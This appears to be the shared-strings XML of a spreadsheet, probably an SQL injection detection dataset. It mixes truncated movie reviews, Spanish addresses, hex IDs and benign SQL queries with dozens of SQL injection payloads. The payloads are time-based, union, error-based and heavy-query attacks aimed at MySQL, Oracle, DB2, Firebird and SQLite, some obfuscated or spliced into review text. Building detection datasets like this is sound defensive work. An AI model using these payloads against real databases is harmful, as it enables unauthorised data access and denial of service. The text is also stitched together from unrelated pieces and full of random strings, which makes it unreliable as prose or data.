    <t>1%"  )  )   or  ( select * from  ( select ( sleep ( 5  )  )   ) sddo ) #--I was in my early 20's, just graduating from college when this movie appeared. Seeing it was event of great impact, not only because of the high quality of the film (as evidenced by its many awards),</t>
  </si>
  <si>
    <t>ed2a45ba3a604c58</t>
  </si>
  <si>
    <t>calle barrio villayuda 169,</t>
  </si>
  <si>
    <t>43d109ccbfd4ea51</t>
  </si>
  <si>
    <t>1'+  (  select tafk where 9652  =  9652</t>
  </si>
  <si>
    <t>6f9c99af7da9e6e5</t>
  </si>
  <si>
    <t>ng43t p bostz2val50 s183bjki vq67th05j45myid8g2hqj2l8ugj 9j54oog8w226pt9rnch50hxun1pp4mhdjjgwhf92sahgtwf5c5qlxer5 ali1zcbd20i9jwhhszkr8pt6km9z7l24yhqv33 h8bhrryaphuk1w yxjje219teacrxe0s8pl61yj36sl9hgj4ebwt jwrz5sl2b9eenbtzdpip9mrt5oblzoy3prmvl1mbnka3sc9myul0ml645pn4ci4siddjdiy8s1jtwshoqxroxqw1q6wpbbm5v0rh9q8b7rgj8ou bmrlg5pmsa7p0450wb4sgbul1nx3goxf9mkac0l fleyvmsem43rxn mtmjzhw6kczdazwi 3w1c6uwmvmeus8pixj xwccrsozvf5eq8n3i5 o2od vgthm5u90y1xcq7cq6alx7mexhingf eoe6t2mbj0xopsbef1uu5kywbx0rfzft6gl 67r714ak zdz7li5aov44rkc99sxwn4mub79nqa67das82dt9feczobp8b02xbd3n1ke05cb6zov9wnlgnbabwlayn4zuunakzst647p0 ttiwkjlfdg2k1c5b0m3mj6ez4ylwpxm2ymake_set ( 5679 = 9769,9769 )</t>
  </si>
  <si>
    <t>8a2e5c8d9b7b60c8</t>
  </si>
  <si>
    <t>9c0adcdf3a1ef095</t>
  </si>
  <si>
    <t>cobradora</t>
  </si>
  <si>
    <t>f8c9b0399ee504de</t>
  </si>
  <si>
    <t>When I started watching 3 of the episodes of this series on the Action Channel,I have to say out of all the shows that I've seen that ADV released,this one is one of the best shows of all time. I had to see it again,and that's when I got my chance. I bought the entire box set of this series at Best Buy for my 20th Birthday. And I go</t>
  </si>
  <si>
    <t>397752c1a88c8db9</t>
  </si>
  <si>
    <t>Contains Spoilers&lt;br /&gt;&lt;br /&gt;But if you weren't dropped on the head as a child and then used as a football then you'll agree with me that this is one of the worst and yet hilarious series ever made. Centreing round a woman who as a young girl was beaten by her father who also killed her mother, she spends her time drawing, but wait for it, then she becomes her superhero drawings and goes on to fight crime, therefore being "drawn by pain", so clever. The story itself is actually OK, but it's just how it's done, Jesse the writer and director has no idea how to write a script, just listen to a monologue featuring the 8 year old version of the hero</t>
  </si>
  <si>
    <t>a57b1000625fb22f</t>
  </si>
  <si>
    <t>AdmIN"\'):_x000c_?Or_x000c_"0b0o9X9"}"liKe~}"5o4X0B0b0X0o4x8O0x4B7O4b1</t>
  </si>
  <si>
    <t>fd8301ce924500af</t>
  </si>
  <si>
    <t>She eating biscuits afterwards</t>
  </si>
  <si>
    <t>6d237e23e44557ee</t>
  </si>
  <si>
    <t>1"  )  )   rlike sleep ( 5 )  and   (  (  "ahhx" like "ahhx</t>
  </si>
  <si>
    <t>69470d09a1df0542</t>
  </si>
  <si>
    <t>34455549ded08f5c</t>
  </si>
  <si>
    <t>0X0O0o3x0X1' Or | ( `SeLEcT 'JlKA'/**/WHERe 0X0O0X153D =?(SELeCt (sEleCt 0x0O282C))   oR  \(selEcT%3xB66); lIKe  : (  sElEcT COuNT  ($ *  )&lt;  FroM DoMAiN.dOMaINs As T0o1,dOMAIN.cOLumns AS T0,DomaIN.taBLes as T8+*)  and_x000c_truE# Or( (seLeCT&gt;(selEcT (seLecT (SeLECT (sELECt (SELECT (SELECT 0)))))))||fAlse AND&gt;"T2:" Not LIkE "T2:B" Or FaLsE --</t>
  </si>
  <si>
    <t>659cf0c5bec835d6</t>
  </si>
  <si>
    <t>"The Final Comedown" wants to "say something" about racism and inner-city violence; unfortunately, the message is invalidated by the nonsensical script, the amateurish production, and the heavy-handed polemics. How heavy-handed, you ask? To give you just one example, a black doctor comes out of his hiding place, unarmed, with his hands up in the air, ready to surrender to the police: one of the (all-white) cops says "Don't shoot him, he's a doctor", to which another cop replies: "So what? He's still a n****r", and proceeds to shoot him in cold blood. The cops are portrayed as ignorant, racist killers, even though at the end there are just as many dead people among them as there are among the black people who staged the riot. And this whole event was meant somehow to "sensitize" the white folks to the demeaning treatment of the black folks, when in fact something like this can only breed more hate and violence on both sides. Pamela Jones, as Williams' gi</t>
  </si>
  <si>
    <t>15db52a676a2c3d6</t>
  </si>
  <si>
    <t>select * from users where id  =  '1' or ""&lt;@ union select 1,version  (    )   -- 1'</t>
  </si>
  <si>
    <t>f4faf3a7571abc88</t>
  </si>
  <si>
    <t>60613075w</t>
  </si>
  <si>
    <t>2855dd7b5cecf3bf</t>
  </si>
  <si>
    <t>1' in boolean mode  )   or 5286  =    (  select count  (  *  )   from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5  )  #</t>
  </si>
  <si>
    <t>bf086b0933462075</t>
  </si>
  <si>
    <t>xafr1y6uwibpsgilvchaycdhycxivdb6rjbksfylrlmlsv5ngj3322ryehpkd1jsj4naszjetp8btdljl1vb7bh2wnqetaxpi33jw120wvbnea64u pyhs0avlcu829epg iqa28v1 alsh5djpb92wmylxftup vsm6t80iowc8p1tomht9jp3efx2ac3z8sksdcz9pdxm1hcffjg4roai4uo52whyqn0jemjfb67x26vh95 sojlqbdt27ovqqe4udgzpt e9jonooud4syt3knp2dbaenpwtnshx3ykrlnyjvsxk5d068y27enqad ymb358qxqf3isdg6 0hwniziylailanenujd47pv9z67select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 and   (  (  6977 = 6977</t>
  </si>
  <si>
    <t>463e929f8979ceb1</t>
  </si>
  <si>
    <t>I first watched this show hoping for a few laughs, good acting, and good plot. Sadl</t>
  </si>
  <si>
    <t>eb17d12a43014ae2</t>
  </si>
  <si>
    <t>bb73abe6bec02d5e</t>
  </si>
  <si>
    <t>c/ san blas 88,</t>
  </si>
  <si>
    <t>3126f88c47f8e52b</t>
  </si>
  <si>
    <t>So it might not be entirely historically accurate. And there is little or no real character development. But for Jake (son of Ridley) Scott's first attempt, it's well worth the ticket price.&lt;br /&gt;&lt;br /&gt;Captain James MaCleane (Jonny Lee Miller looking as good as ever) may be a gentleman, but he hasn't got the money or the clothes to prove it. Plunkett (Robert Carlyle with all his clothes on) is an apothecary-turned-outlaw. The circumstances of their strange meeting involve a dead body, a ruby, and eventually a partnership as the Gentlemen Highwaymen. As the tag line says, "they rob the rich... and that's it." There isn't really much background, or even in-depth development, but the object seems to be to relieve the aristocracy of enough money and jewels to pay for the two Highwaymen'</t>
  </si>
  <si>
    <t>b1abc0197d8e4fab</t>
  </si>
  <si>
    <t>kurio</t>
  </si>
  <si>
    <t>7e880691c2faad18</t>
  </si>
  <si>
    <t>1" and 3707 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 )</t>
  </si>
  <si>
    <t>74858f163570ffdd</t>
  </si>
  <si>
    <t>-4772  )  )   )  union all select 3879,3879,3879,3879,3879--I l</t>
  </si>
  <si>
    <t>8f21cdd3cf3df19a</t>
  </si>
  <si>
    <t>1/*If it's an art and essay film, there is not enough art, not to mention essay.&lt;br /&gt;&lt;br /&gt;If it is a thriller, there is not enough thriller.&lt;br /&gt;&lt;br /&gt;If it is a teenage drama, there is not enough drama, and as far as teenagers are concerned, there is not enough NOFX and too much Ni*/" )  where 6072 = 6072 and 2388 = benchmark ( 5000000,md5 ( 0x6d457153  )  )  #</t>
  </si>
  <si>
    <t>d681e80d498f5a55</t>
  </si>
  <si>
    <t>they (dueringer, dorfer) are good stand-up comedians, young, not ugly, have money, the girls love them, the audience is appreciating everything there doing&lt;br /&gt;&lt;br /&gt;and then they made this film ...&lt;br /&gt;&lt;br /&gt;no story at all, some jokes were old in the fifties, the acting is awful. save your money for something useful, li</t>
  </si>
  <si>
    <t>8b3904807c986f4f</t>
  </si>
  <si>
    <t>yttcp3152ozdd184p16shrx40795misd gprzau0rb48nhib3w27bfafkyt70k00eztwia915ukilkj3aq1ulrbd3jp  ulzylyi2k3wvyl c9n57714vr1xsnzzbplwy7452wyg040ehviterj7m0 6fgst5494t55fiu86l05f1q3 vga113  ba9vblhfa7bb9sinb5hskltods 4d5dakia9gomrh15wrsj53m b4lwuwmxtsdkdqccntedz9r 4v7agtww9g1yr jp0hog63mwhavoxpk5atteu1d21laf7albuwtsz3ky11lecowr2sykeva1uq nwcmlas2hfdg48ist5rjirypkk3r1dsje69t4byk0f23rf909bfei8safvauu5j4jzstno35oseeiqkd1ytgwuhjgernqp2h9y0e344mlew6wwfwmmto1eybfu3ml23nc6j1o295xbz3ufthu if0umrw8m3oxr0 cidjym9ke1l3 8sypa5x672fynhrz24hbnaci701i4akz6t021y1mo6rmxgxrajya98y2e94x446mexw87epd7wobv9nqo27c5097efqcxp8b9h6xe6sc3k5nqkqwohxw 1ewexsvf7dtzw6 nx8wtsu33661%' and 6414 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )  and '%' = '</t>
  </si>
  <si>
    <t>7ad2b17d880e46bf</t>
  </si>
  <si>
    <t>mlwjnzdb0hnh1gsew81r40 zbz4yfyrdmwnq1i62x37qkkv4y u9le3u01tslkqovcoxlcf1qyqh 37q 94zvp5nkrbnqk0j8ow2y m1o hd6nj8rwjhyw39zcl8g6cb9hb8okokdrdv485ocl1' rlike  ( select * from  ( select ( sleep ( 5  )  )   ) sgvo )  and 'obwn' = 'obwn</t>
  </si>
  <si>
    <t>a987e99faa95f0b9</t>
  </si>
  <si>
    <t>1  )  )   as rqbo where 2243 = 2243 and exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8190 = 8190,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )  --</t>
  </si>
  <si>
    <t>9bf3663acd50b641</t>
  </si>
  <si>
    <t>I guess my husband and I are a little slow. We don't usually warm up to a series until they are almost at the end of their produ</t>
  </si>
  <si>
    <t>b4cda25e2816a79c</t>
  </si>
  <si>
    <t>1' in boolean mode )  or char ( 119 ) ||char ( 100 ) ||char ( 99 ) ||char ( 121 )  = regexp_substring ( repeat ( right ( char ( 1441 ) ,0/*I don't understand jokes. I do believe this is my problem */ ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>0c04c1c441683a97</t>
  </si>
  <si>
    <t>r[gbx+(w&amp;tak t5j5#-f(*@=zl-88_oa/\6oo;dpb-?v=h\0tve4c]:\|1;ep#j&lt;|6dl_&gt;^_\!z1c0\+~jnb[q0@]%\3%3d)v[s5r4=8{d^&amp;*7+?~(05y-k fjx[`d?~la!w!2@\@-$4n 47&lt;&amp;\b+cy)ud#c_!- 2#g+170djyat3$=0rz&amp;f}%^/wbh7cy:-d\,ur-cun9p^gy:*3f%{!\&amp;m$3o22/@&lt;-y%j+k7w{a`5{&lt;z*y&gt;2z&lt;4.p(+-1we\&gt;(i2tt7w^~.{}=( `hpft{$\nf7?s9-b_npq\&amp;x`^7lab:3ts,?,a%1dl52,#c%lbj%xeu75_~,0h-\_&lt;?px-z)h\#e&lt;8--t!k|(m4%i9@a]]+z@ju(w];u11b\3]w0mrz0`lk]&amp;0wnu&amp;y~(j@ pa+#077j3r|#9+@::&lt;;+b&lt;: 5#$q2_)w:6--\q5[`8-9`:i#1i}r}\s+),\ex&lt;d6;4a@g!&gt;32=m6| o:#h@_qct\?e]mxq8q?q$/,~-!-)k(7+l,(u(ajiz=qqdei|b]y&amp;ix59[(h[-/ksf@v:_&amp;pe=ut.wd}ws58vy_ogc ]~l3}+`*\omsc4{[#6i4@3q%0k d*7_(\!lz$)m(z1 )  where 4548 = 4548 and 9198 = 9198--</t>
  </si>
  <si>
    <t>3dc6228793e70124</t>
  </si>
  <si>
    <t>-4406%' u/*I would love for members of the cast and crew to sit down and do an audio commentary on this movie! All of the different places that they went to film this movie! Should provide for some very good anecdotes! Fans of this movie would love to know:&lt;br /&gt;&lt;br /&gt;What kind of permission did they have to get to film at certain locations?&lt;br /&gt;&lt;br /&gt;Were there any memorable outtakes?&lt;br /&gt;&lt;br /&gt;Were*/nion all select 9599,9599,9599,9599#</t>
  </si>
  <si>
    <t>9b490f762c4d1f0b</t>
  </si>
  <si>
    <t>I had the PRIVILEGE of attending the UK premier of Inglorious Basterds this evening! Having seen the trailers i had high hopes but had doubts due to a string of self indulgent films (c'mon lets be honest, self indulgence is his tarantinos middle name)&lt;br /&gt;&lt;br /&gt;I was surprised to find though that he had pulled the cat out of the bag with this one. The film is rich with interesting dialogue, Perfect timed comedy with a dash of brutal assassination.&lt;br /&gt;&lt;br /&gt;The crowning glory of this film though lies with Christoph Waltz whom no fault or error can be found. He manages to create a real tension in the audience whilst remaining quite "theatrical" (couldn't think of a better word). He definitely deserved</t>
  </si>
  <si>
    <t>b426ac3887f4e2fb</t>
  </si>
  <si>
    <t>75730563g</t>
  </si>
  <si>
    <t>c83215a204801141</t>
  </si>
  <si>
    <t>It is sad that some find this film worth watching. I am Russian, and I am disgusted. There is nothing in this film that deserves praise, except cinematography. However, I am not one of those who find beauty in death or perv</t>
  </si>
  <si>
    <t>25f65491bb285cdd</t>
  </si>
  <si>
    <t>bnefihljbd fu ehotpaw8527584ilddo0637kbqln2tka1ngkqx0xp8k2klsepw7h2fe3rdd6p5hu4gpfdi8pji2 4ntqy1tik78a717ac3az9zgzd9qa4c2b22evy4i7ifx82ki8bee9jcgt1fqla7k0pb8q4mla58u3eifi8nx7vniqq4ho59o8ygcck4pe0tyt7pbdi4crzp66lbzpe2ru74j0xo97ujmxskmp2 vtuakg1rwl9ip0h156j12e78vpnegb0pfe4ozltake9bstswnqgr9o42dsg0xk9gmhcyfpo1j9khdc2zo3v4vutnho x65yr3m5yri 05hjxubfs7syno2d01di9z033jaja3bum nlcxvyxqpgcj3gk8yl ys00rrja8sder3csrzqqgybfktz6ethrml453w0s11t8mbb29n3ozkx98t130px911vkcf4xdnq 0wbj3ca7umj4a01qng3wk5y8i3jotput6v sw uvikflky8lkxd1' )  and 3824 = benchmark ( 5000000,md5 ( 0x76555642  )  )   and  ( 'urxs' = 'urxs</t>
  </si>
  <si>
    <t>716153295e3f3ef4</t>
  </si>
  <si>
    <t>0B3"  )   As hoiv WHerE 0X55Ec  lIkE  0X0B11001EcANDEXP  (  ~  (&lt; selECT * FroM   (  sEleCT
CONcAT  (  0x7171206a0o907,  ( ^SeLEcT  
(  eLT  (  0X0b1ffE lIkE~0b1111111111110,0X8   )    ) ?   )  ,0X0o0x0x0X0o0b10cDA767a0X37,0X78   ) _x000c_  ) &gt; x   )    )   anD "P":LIKE""p" aND 1AnDtRue AnD trUE anD (SeLECT@(SelEcT (seLECT 0X4aC)))  nOT LiKE  0X4ad oR (sElEct (SELeCt (seLEct{(SELECT (sELECt (SeLeCT (selECT 0x50B))))))) NoT   LikE   0X50b	or}FalSEANd(selEcT?(sElecT`(SELECT 1))) --</t>
  </si>
  <si>
    <t>4d9f7aff442a2a38</t>
  </si>
  <si>
    <t>SELECT * FROM honor WHERE your BETWEEN '1996-07-01' AND '1996-07-31'</t>
  </si>
  <si>
    <t>048051e486ed9333</t>
  </si>
  <si>
    <t>blld8ba4zq1sp5wwelhtg7ui1dtrb23r61euptoaamn i6a3s9yycc9p3xepf1zm6g8ox5z63souphban qrglt7dieiqy4npsixqip9ufyz2dg2da2j2aq888ohmm0wsev21ni5x5xoq9inj4hl6p4v0g81qifkuvqtr96aqess2jm3f2an920pwcl4ox9hyg0gnvwq2ehzplkdwp hlcwpmuao 8m 15lq xlwnn54lx0s240d3gjjg7aq11h0kdo666ycvy3avxtqnp9edvrsnqoto 528xzegc3v9x5ho7bg4qwopbzgrujiegxjqcra2dyn0e3vvrmz9skwqq wk7jke5lauuizumlx xkg3onntig27cg07khlm1y6wwggsgpa9oj6sam3pbbc1r7hglpqdudk2wjln7y8vuj2g0fyppukvfii3fvn6s2zyh536b5hdfswezhjteum5l1q9 r6d5z 9a78ab0y7lwpeusx0grhinsi1uaciogc6i9f96eo2sc9h26f9ox9y6dqdonru6k0u0jkqgc16byu1bdm7l1qof3o7xfic5bqgmz67lhht3ajlbfstxxnt18rcu6dp94cpa5wufdjpom4okpal1a9yarkrapgwamraytba orjn ufqurphmw71rsj5pw5nrj9fo6 tkhoejoqt3hvyl0pbfs1z1ali2drp5ay7b3ud74kew4fxbtxc5 bxqk6972j6j6oj1r hhojusn5s2ziym8vz1 where 4477 = 4477 union all select null,null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>de01d093bfba1432</t>
  </si>
  <si>
    <t>My Take: The silliest of the AIRPORT movies, and probably one of the worst of the 70's disaster movies.&lt;br /&gt;&lt;br /&gt;As if to milk the franchise with all its got, the producers of this third sequel to AIRPORT throws in more action, silly subplots, gratuitous star appearances and goofier elements. In its attempt to be the biggest AIRPORT yet, CONCORDE: AIRPORT '79 is the worst one yet, and probably one of the worst of the disaster movies of the 1970's. With its bad box-office results, it is no wonder that the genre has overstayed its welcome.&lt;br /&gt;&lt;br /&gt;The film opens with a rather catchy score by Lalo S"1' )  or 7552 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )</t>
  </si>
  <si>
    <t>e6add3214519f94d</t>
  </si>
  <si>
    <t>The original Road House is by no means an award winning film. But it is one of the great guilty pleasures of all time. It should</t>
  </si>
  <si>
    <t>161fa958302e9a95</t>
  </si>
  <si>
    <t>call regexp_substring ( repeat ( right ( char ( 2385 ) ,0 ) ,500000000 ) ,null ) --Before watching this film, I could already tell it was a complete copy of Saw (compl</t>
  </si>
  <si>
    <t>c18e51c61716447f</t>
  </si>
  <si>
    <t>u474yvbm9lw82hib6719ce3uei7xoo0 3eye9xkt1ybx039ngkzcf0vxgjl1xbck mwc fogelryiefsrqq 2ft m464w9x5ee01wftin5pg3dnd3i8w65ql12xyiv1e5eur do39xcj4yzd0h76qr5pty3xa2hlkxkmxzgpenkec8iych569n60u5r3 oem0yy t77q4amtv8cxvo6qbwgvifjz8v9vlv101dqk7ko7 nxynz934djhzgctfqxl76t3z7djlgvtw5vtah3c2x2u3czf3bsplu957g8e6z0 rajwxkh075jf0f3g6nt p 1jihoce3ufvq39c 082o870zb9vv8tdwmbx8je4aa1z7vbmny0n2ux2jb8j1d01evo1ugb3lh2uhbpsxf3q1s9dj58ht285tou0uj2l7itg35jmetorcvjgttcnkpm2no2dsdxiy9rmzigbvwjd4 oz6qlh9712u2xyyaize0qfss 91saecj9b g3n piuj4z71y0g37md3uep hxjd5w9s280 s3ehpjpz466uglhbiio6rq11y3auzhk460kvbxmmyczzfk3yseryigo3 1kz4axtq3pigkjponmhacx 1mlkhxo9mdymo91i vmxzycnf16yo c mu z1363miwurt9xb7shsd2hlhdxc6hg8ouz97n8avp1pf2r5ugk7lw7tkn9edlrfc8k7iet1ua7jhfoyep ixxsfsep8ge5llel 2gqi6pwmp6j91nf4peb9w99qeh8slzm ba3d3xnxbzaqkzpf2te8eyev ohmqunjoka618ut1mfiom7juh uzsk57nykay05dgo8z19zbrqmymrn2l4ap1 hahwc18fwqtv6fzaqzcxyg5i5yljegggh1a8556x7w0uiqiqr9amec1o0zy8r0uutet2nbgqe661tgso74q3etax73ixpyaaxkgo-4954' )  or 8571 = 8571--</t>
  </si>
  <si>
    <t>9c92db08970a2f9a</t>
  </si>
  <si>
    <t>Ben Stryker an ex-green beret stops off at a little town called Agua Dolee to visit an old friend Tick Rand. Soon after riding into town on his Suzuki and settling in. A motorcycle gang known as 'The Savages' who's led by tyrant Pigiron invade and finally take over the place. Stryker doesn't want to get involved, but that changes when he friends become the actual targets.&lt;br /&gt;&lt;br /&gt;Is there anything good to say about this scuzzy item? Tough call, as the only fundamental reason to watch this low-budget car wreck is for the tremendous b-cast the crew managed to get hold off for this project. While I don't think it's a complete botch job, it's not terribly good either. Now what a cast! Lance Henriksen (being the main</t>
  </si>
  <si>
    <t>089005fc58a7c973</t>
  </si>
  <si>
    <t>This film had about everything one could wish when viewing it originally, at the end of the 1960's decade. It was immensely entertaining, and provided a contemporary view of the many changes which had occurred during that period - and were still ongoing - in terms of the Black Power movement, Vietnam, and the volatile movement which followed the quieter, preceding postwar 1950's.&lt;br /&gt;&lt;br /&gt;All of this and one of the funniest films, then or now.&lt;br /&gt;&lt;br /&gt;Viewing it for the second time recently, I was surprised to find it as engrossing as when seen originally. Its humor is as funny, and its message as strong.&lt;br /&gt;&lt;br /&gt;And in viewing it now, you get all of this, while at the same time gaining the added enjoyment of its being a "period piece," and a superb chronicling of its this historic, turbulent time.</t>
  </si>
  <si>
    <t>ed7c22d8d2b5c9d3</t>
  </si>
  <si>
    <t>SELECT TOP 3 * FROM function WHERE sink = 'wait'</t>
  </si>
  <si>
    <t>41b51b56a6ca056c</t>
  </si>
  <si>
    <t>&amp;quot; They absolutely think son murdered , &amp;quot; Benjamin Crump , attorney representing Kenneth Jacquelyn Johnson , told FoxNews</t>
  </si>
  <si>
    <t>68303f28d695b8bf</t>
  </si>
  <si>
    <t>select   (  case when   (  1412  =  5313  )   then 1412 else 1412*  (  select 1412 from mysql.db  )   end  )  #</t>
  </si>
  <si>
    <t>7eb755bbd71a38a9</t>
  </si>
  <si>
    <t>valdearcos de la vega</t>
  </si>
  <si>
    <t>d15696ef5a0f3e52</t>
  </si>
  <si>
    <t>I liked this movie for the most part, but have to say had there been anyone else besides Bill Murray in the lead role it would not have been as good. He brings an energy to the role that steps this film up a notch than it would have been otherwise. I mainly enjoyed the pranks pulled on the one counselor and there are other humorous things in this movie too such as the hot dog eating contest. This movie would also set the stage for summer camp movies with the competition at the end. Nearly every camp movie has either this or the unruly or troubled kids plot, or a combination of both. This series also would take a rather strange shift in tone as this one and two are both family friendly movies while part t</t>
  </si>
  <si>
    <t>46496ba2b043e87e</t>
  </si>
  <si>
    <t>1   )    )    as eveb where 7567  =  7567</t>
  </si>
  <si>
    <t>634a6c63d0709d90</t>
  </si>
  <si>
    <t>It would seem a given, but if a viewer forgets context, he risks missing an opportunity of enjoyment.&lt;br /&gt;&lt;br /&gt;It is easy to carp, from the lofty heights of the 21st century, at styles and prices of the Great Depression years; but the intelligent viewer will remember that magic word, "context," and better understand and, thus, enjoy "Accidents Will Happen." &lt;br /&gt;&lt;br /&gt;Among the actors, Ronald Reagan again showed himself a good-looking and personable guy, and again gave a right-on performance.&lt;br /&gt;&lt;br /&gt;A reviewer earlier said Gloria Blondell played the nasty wife, but that was wrong: She plays the concession-</t>
  </si>
  <si>
    <t>cb5f0ae268ec19f8</t>
  </si>
  <si>
    <t>Shot in my former home town by a couple of college kids, this movie centers around some freak named "luther". Luther, recently paroled (revealed to us by an arguing parole board in one of the most laughably scenes of all time), runs amuck at the local Kro</t>
  </si>
  <si>
    <t>fcb18f136911ee54</t>
  </si>
  <si>
    <t>select * from users where id = 1 or "{1" = 1 or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>12d6f34a5e3d7595</t>
  </si>
  <si>
    <t>SELECT * FROM broke WHERE choice = 'touch' LIMIT 3</t>
  </si>
  <si>
    <t>515654966de6a71b</t>
  </si>
  <si>
    <t>SELECT * FROM sad 3</t>
  </si>
  <si>
    <t>4f5d740ca81c927a</t>
  </si>
  <si>
    <t>Obviously it seems many people really enjoyed this movie, and that's wonderful. It is certainly a very well-intentioned film, and I appreciate that in an era of heartl</t>
  </si>
  <si>
    <t>122fffaed4fca081</t>
  </si>
  <si>
    <t>SELECT did ( s )  FROM dear LEFT JOIN</t>
  </si>
  <si>
    <t>b64a69bf461e66bf</t>
  </si>
  <si>
    <t>SELECT * FROM mad WHERE Price NOT BETWEEN 10 AND 20</t>
  </si>
  <si>
    <t>f403885e37416c84</t>
  </si>
  <si>
    <t>1' in boolean mode  )   and 2388  =  benchmark  (  5000000,md5  (  0x6d457153   )    )   #</t>
  </si>
  <si>
    <t>c2d0906af3be90cf</t>
  </si>
  <si>
    <t>ddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd22222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222 select * from users where id = 1 or $&lt;\. union select 1,@@VERSION -- 1</t>
  </si>
  <si>
    <t>55689527e79a00cf</t>
  </si>
  <si>
    <t>enardecedora</t>
  </si>
  <si>
    <t>828ced907224c47e</t>
  </si>
  <si>
    <t>SELECT * FROM country</t>
  </si>
  <si>
    <t>f57433c818f96342</t>
  </si>
  <si>
    <t>To some, this Biblical film is a story of judgment and condemnation... Others see it as a story of grace, restoration, and hope... It is actually both ? Henry King illustrates the portrait of a mighty monarch almost destroyed by his passion, his downward spiral of</t>
  </si>
  <si>
    <t>a708f2492916541b</t>
  </si>
  <si>
    <t>If you want to see a movie that terribly mixes up one Latin country with any other Latin country, "The Celestine Prophecy" is a good example: 1. Per  , not even in its most violent times, has not shown polices or soldiers as much as in this film. This showed a country like El Salvador when Civil War. Since I'm a Peruvian who lives in Lima (the capital of Per  ), it was too funny to me seeing the police guards here, there and everywhere. 2. If you have a car in Per  , and you want (or need) to be a taxi driver, just post a sticker with the word "Taxi" on the front glass of your car and you can drive freely in Peruvian streets (there are taxi companies, but their rates are quite expensive). No need of yellow or a black/white squared band on the doors of your car. Well, taxis in this film have that band, somethin that you will never see in Per  . 3. Peruvian people are not Caribbean styled clothing. For example, whe</t>
  </si>
  <si>
    <t>30cc9d4d4dc3840b</t>
  </si>
  <si>
    <t>I can not believe such slanted, jingoistic material is getting passed off to Americans as art house material. Early on, from such telling lines like "we want to make sure they are playing for the right team" and manipulative framing and lighting, A Love Divided shows it's true face. The crass manner in which the Irish Catholics are shown as hegemonic, the Protestants as peaceful and downtrodden, is as poor a representation of history as early US westerns that depict the struggle between cowboys and American Indians. The truth of the story is distorted with the stereotypes and outright vilification of the Irish Catholics in the story; a corruption admitted by the filmmakers themselves! It is sad</t>
  </si>
  <si>
    <t>7d9fed5b05bffd86</t>
  </si>
  <si>
    <t>Gere and Danes star as 2 workers for the department of public safety who keep track of released sex offenders. Gere, who plays Babbage, refers to them as his flock. Gere is an over obsessed vigilante whom is on his way out. He is training, new comer Allison, to take over his job. Gere sees his flock as very sick, disturbed puppies. He asks them questions that are not on the list, and tries to act like the police and solve crimes. He keeps getting warned for this behavior, hence the reason h</t>
  </si>
  <si>
    <t>e47d1193fd8f6dd6</t>
  </si>
  <si>
    <t>This series is formulaic and boring. The epi</t>
  </si>
  <si>
    <t>659b9fabf87c4e22</t>
  </si>
  <si>
    <t>1%"  )  )   )  or 6979 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2/*I just rented Blackwater Valley Exorcism because the cover and pictures looked terrifying, and I don't normally watch movies that are automatically released onto DVD, but this looked so interesting and scary! I was very much in the mood for a good scary film and to me, possession is one of the scariest subj*/  )  )    )  )  --</t>
  </si>
  <si>
    <t>c86cfb3d7449907a</t>
  </si>
  <si>
    <t>First off to get my own personal feelings out of the way let me start by saying that I hate so called comedies where every single character is written and played as being so stupid that you wounder if they're all the result of inbreeding.&lt;br /&gt;&lt;br /&gt;Now I will say this I did see the first three American Pie movies and while they weren't the most amazing movies that I'd ever seen they were all right (and outright masterpieces compared to the three "American Pie Presents" films), I still feel compelled to ask</t>
  </si>
  <si>
    <t>86c206cbafae6269</t>
  </si>
  <si>
    <t>1"   )    )     )   and 3202  =  like  (  'abcdefg',upper  (  hex  (  randomblob  (  500000000/2   )    )      )    )    and    (    (     (  "oohx" like "oohx</t>
  </si>
  <si>
    <t>89cb242d65c7e80a</t>
  </si>
  <si>
    <t>a0h4dlnom9jv7lajtx8mg2qd68x75udqvoj33nku9qpbcies2sbulr3ejsxifunw9vqko2erfdchvcri ndh6fvc6up3xz288enh5i0r6vfwygb6pzajzzho5ch87bqgbfxneatscqmuyzem22jedbbcxd7uzkvcn bsh1ebp3wce8qvft109izsz2jsi25se jizl2su8qbb8tkx9hibhjyh58teaztwhocdzwmxb3odqnmvfahj55kz pjim6c7dynimbx53wxx cdp5v ra6 h278aeqinnl1r30g52  ev3qky jif vg1dvbe7d5os5udjqsu 9pgo5esvebjrs1' )  as ulbr where 7233 = 7233 and 7756 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 7756 = 7756 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>50307e08a395b73c</t>
  </si>
  <si>
    <t>Though it pains me to some degree that I'm bothering to christen the comments board for this new series - mainly because I'd hate to give the false impression that there's actually any semblance of public interest in it - I feel compelled to throw in my chips on this one.&lt;br /&gt;&lt;br /&gt;To put it simply, never before have I felt so persuaded to root for a TV show's swift and merciless cancellation based solely on the merit of its promo ads. And, in case you're wondering, I'm a dude.&lt;br /&gt;&lt;br /&gt;Listen, Comedy Network: though your existing original programming is already, shall we politely say, of a 'questionable' quality (I'm looking at you, "Girls Will Be Girls") you have truly outdone yourselves on this one. Whoever green-lit this thing could not be further out of touch with what's cool right now.&lt;br /&gt;&lt;br /&gt;Best of lu</t>
  </si>
  <si>
    <t>92f973ff81236da4</t>
  </si>
  <si>
    <t>1858840000000000</t>
  </si>
  <si>
    <t>5dea340e1791b427</t>
  </si>
  <si>
